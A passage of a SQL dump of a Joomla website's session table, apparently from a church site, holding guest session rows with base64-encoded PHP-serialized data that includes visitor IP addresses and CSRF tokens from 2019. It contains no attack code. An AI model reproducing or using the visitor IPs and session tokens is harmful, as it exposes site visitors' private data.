yeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fXM6MTA6ImNvbV9tYWlsdG8iO086ODoic3RkQ2xhc3MiOjE6e3M6NToibGlua3MiO2E6MTp7czo0MDoiYTIyNzUxNDUyYTRkMDU3NjAwMmI2ZGNiZmQ0ZDgzOWUxNWJiNWIwNSI7Tzo4OiJzdGRDbGFzcyI6Mjp7czo0OiJsaW5rIjtzOjkzOiJodHRwczovL2xpZmVvYXNpc2ludGVybmF0aW9uYWxjaHVyY2gub3JnL3Jlc291cmNlcy9ibG9nL2l0ZW0vMzQtcHJheWVyP3RtcGw9Y29tcG9uZW50JnByaW50PTEiO3M6NjoiZXhwaXJ5IjtpOjE1NjkzNzc5MDg7fX19fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";', 0, ''),
(0x6134323832626232326235373730336639396232633232386233363263383838, 0, 1, 1569377917, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3NzkxNztzOjQ6Imxhc3QiO2k6MTU2OTM3NzkxNztzOjM6Im5vdyI7aToxNTY5Mzc3OTE3O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6IjQ1Ljc5LjIxMC41NyI7fX1zOjg6InJlZ2lzdHJ5IjtPOjI0OiJKb29tbGFcUmVnaXN0cnlcUmVnaXN0cnkiOjM6e3M6NzoiACoAZGF0YSI7Tzo4OiJzdGRDbGFzcyI6MDp7fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";', 0, ''),
(0x6134393635633937386532313538666637336233633830383434343366396337, 0, 1, 1569385729, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NTcyOTtzOjQ6Imxhc3QiO2k6MTU2OTM4NTcyOTtzOjM6Im5vdyI7aToxNTY5Mzg1NzI5O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTU6IjE3My4yMzAuMTMzLjE2NCI7fXM6NToidG9rZW4iO3M6MzI6Im9RcXViQnlLRFplVG1sU2RLRGhqbE5ITUlGbGlGdlF3Ijt9czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x6134396264636165333035666136333633313263313737616663663432653131, 0, 1, 1569384975, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NDk3NDtzOjQ6Imxhc3QiO2k6MTU2OTM4NDk3NDtzOjM6Im5vdyI7aToxNTY5Mzg0OTc0O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijg1LjEwLjIwNy4xOTUiO31zOjU6InRva2VuIjtzOjMyOiJKQzJTYkNLVzNYZVlqWVU5OURjR3pMNUR0R3FsczQ3byI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x6135383265373363626438346262643364363366343335653561353339383464, 0, 1, 1569382645, 'joomla|s:760:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aTo5O3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM1NDMyNjtzOjQ6Imxhc3QiO2k6MTU2OTM3OTEwNTtzOjM6Im5vdyI7aToxNTY5MzgyNjQ1O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTQ6Ijk0LjE3My4yMzQuMTI0Ijt9fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x6135393636326163326533616562633662376436666263353662646636656533, 0, 1, 1569382269, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjI2OTtzOjQ6Imxhc3QiO2k6MTU2OTM4MjI2OTtzOjM6Im5vdyI7aToxNTY5MzgyMjY5O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijk1LjIxNi4yNy4yMDkiO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x6138306161383733316236333632626638323166393030626461303436663962, 0, 1, 1569376526, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3NjUyNjtzOjQ6Imxhc3QiO2k6MTU2OTM3NjUyNjtzOjM6Im5vdyI7aToxNTY5Mzc2NTI2O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6IjY2LjIyOC40MC4xODUiO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x6138363038383133346665623863613764323635343238343463306666663432, 0, 1, 1569385356, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NTM1NjtzOjQ6Imxhc3QiO2k6MTU2OTM4NTM1NjtzOjM6Im5vdyI7aToxNTY5Mzg1MzU2O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTQ6IjE5OC41OC4xMDYuMjQ0Ijt9czo1OiJ0b2tlbiI7czozMjoibjFqWHhVekRLSGV5NlRjZFByNVg3Y2FhSGtmMlFEY2giO31zOjg6InJlZ2lzdHJ5IjtPOjI0OiJKb29tbGFcUmVnaXN0cnlcUmVnaXN0cnkiOjM6e3M6NzoiACoAZGF0YSI7Tzo4OiJzdGRDbGFzcyI6MDp7fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";', 0, ''),
(0x6139613535386136363238333164316338313662353034323738633130303532, 0, 1, 1569382162, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjE2MjtzOjQ6Imxhc3QiO2k6MTU2OTM4MjE2MjtzOjM6Im5vdyI7aToxNTY5MzgyMTYyO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijk1LjIxNi4yNy4yMDkiO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x6162363436643264313533636666373532346636326637306431363632643362, 0, 1, 1569382072, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjA3MjtzOjQ6Imxhc3QiO2k6MTU2OTM4MjA3MjtzOjM6Im5vdyI7aToxNTY5MzgyMDcyO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijk1LjIxNi4yNy4yMDkiO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x6162666234366364303239393533643566323538336436336661343735333533, 0, 1, 1569382235, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjIzNDtzOjQ6Imxhc3QiO2k6MTU2OTM4MjIzNDtzOjM6Im5vdyI7aToxNTY5MzgyMjM0O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijk1LjIxNi4yNy4yMDkiO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x6164323661373330346431666664343964626562386264336332356631393666, 0, 1, 1569383146, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MzE0NjtzOjQ6Imxhc3QiO2k6MTU2OTM4MzE0NjtzOjM6Im5vdyI7aToxNTY5MzgzMTQ2O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTQ6IjE5Mi4xNTUuOTUuMTM5Ijt9czo1OiJ0b2tlbiI7czozMjoiS1J5clVBNXNLOGE4WENDUERDWFluMFZ1U0k0SUdkRUkiO31zOjg6InJlZ2lzdHJ5IjtPOjI0OiJKb29tbGFcUmVnaXN0cnlcUmVnaXN0cnkiOjM6e3M6NzoiACoAZGF0YSI7Tzo4OiJzdGRDbGFzcyI6MDp7fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";', 0, ''),
(0x6164333963393365303263323864313161343838363061373365366465633637, 0, 1, 1569382221, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjIyMTtzOjQ6Imxhc3QiO2k6MTU2OTM4MjIyMTtzOjM6Im5vdyI7aToxNTY5MzgyMjIxO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijk1LjIxNi4yNy4yMDkiO31zOjU6InRva2VuIjtzOjMyOiJmeEEzb3h3Nkp2NlJHQUZZN0dPUFpQVG9XMHozeXNlZiI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x6164633734383262663233366563316338393438363864306632306665333465, 0, 1, 1569379963, 'joomla|s:824:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3OTk2MjtzOjQ6Imxhc3QiO2k6MTU2OTM3OTk2MjtzOjM6Im5vdyI7aToxNTY5Mzc5OTYyO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6IjY2LjI0OS44OC45MSI7fXM6NToidG9rZW4iO3M6MzI6IjRZc3lIUklXWVl2T2FlWDg5REJKM0h4QWdqY3poOHRkIjt9czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x6165363961376235616133366438316362646462656463326634626364653561, 0, 1, 1569382366, 'joomla|s:824:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjM2NTtzOjQ6Imxhc3QiO2k6MTU2OTM4MjM2NTtzOjM6Im5vdyI7aToxNTY5MzgyMzY1O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6IjIwNy40Ni4xMy4xNCI7fXM6NToidG9rZW4iO3M6MzI6Ildaek10aTdqUDZjdGF5MURqQmpieVpYVEtZT011SmV2Ijt9czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x6165373433303933643238306136383661646562396465613535363165386662, 0, 1, 1569382259, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjI1OTtzOjQ6Imxhc3QiO2k6MTU2OTM4MjI1OTtzOjM6Im5vdyI7aToxNTY5MzgyMjU5O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijk1LjIxNi4yNy4yMDkiO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x6166343036643564613964333734393538313962363335643332326133646536, 0, 1, 1569378878, 'joomla|s:824:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3ODg3NztzOjQ6Imxhc3QiO2k6MTU2OTM3ODg3NztzOjM6Im5vdyI7aToxNTY5Mzc4ODc3O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTE6IjQ1LjMzLjc2LjE3Ijt9czo1OiJ0b2tlbiI7czozMjoiWmVtOGJnYzJZNTh2c2F6amhXNTdCVnJMYlBZZEV0MkQiO31zOjg6InJlZ2lzdHJ5IjtPOjI0OiJKb29tbGFcUmVnaXN0cnlcUmVnaXN0cnkiOjM6e3M6NzoiACoAZGF0YSI7Tzo4OiJzdGRDbGFzcyI6MDp7fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";', 0, '');
INSERT INTO `y57u5_session` (`session_id`, `client_id`, `guest`, `time`, `data`, `userid`, `username`) VALUES
(0x6166346236666434383964363139393831623664613361313033383839343536, 0, 1, 1569384150, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NDE1MDtzOjQ6Imxhc3QiO2k6MTU2OTM4NDE1MDtzOjM6Im5vdyI7aToxNTY5Mzg0MTUwO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6IjY2LjI0OS45My4yOSI7fX1zOjg6InJlZ2lzdHJ5IjtPOjI0OiJKb29tbGFcUmVnaXN0cnlcUmVnaXN0cnkiOjM6e3M6NzoiACoAZGF0YSI7Tzo4OiJzdGRDbGFzcyI6MDp7fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";', 0, ''),
(0x6230613066343365356464336561393363643734633763373166626538346264, 0, 1, 1569382124, 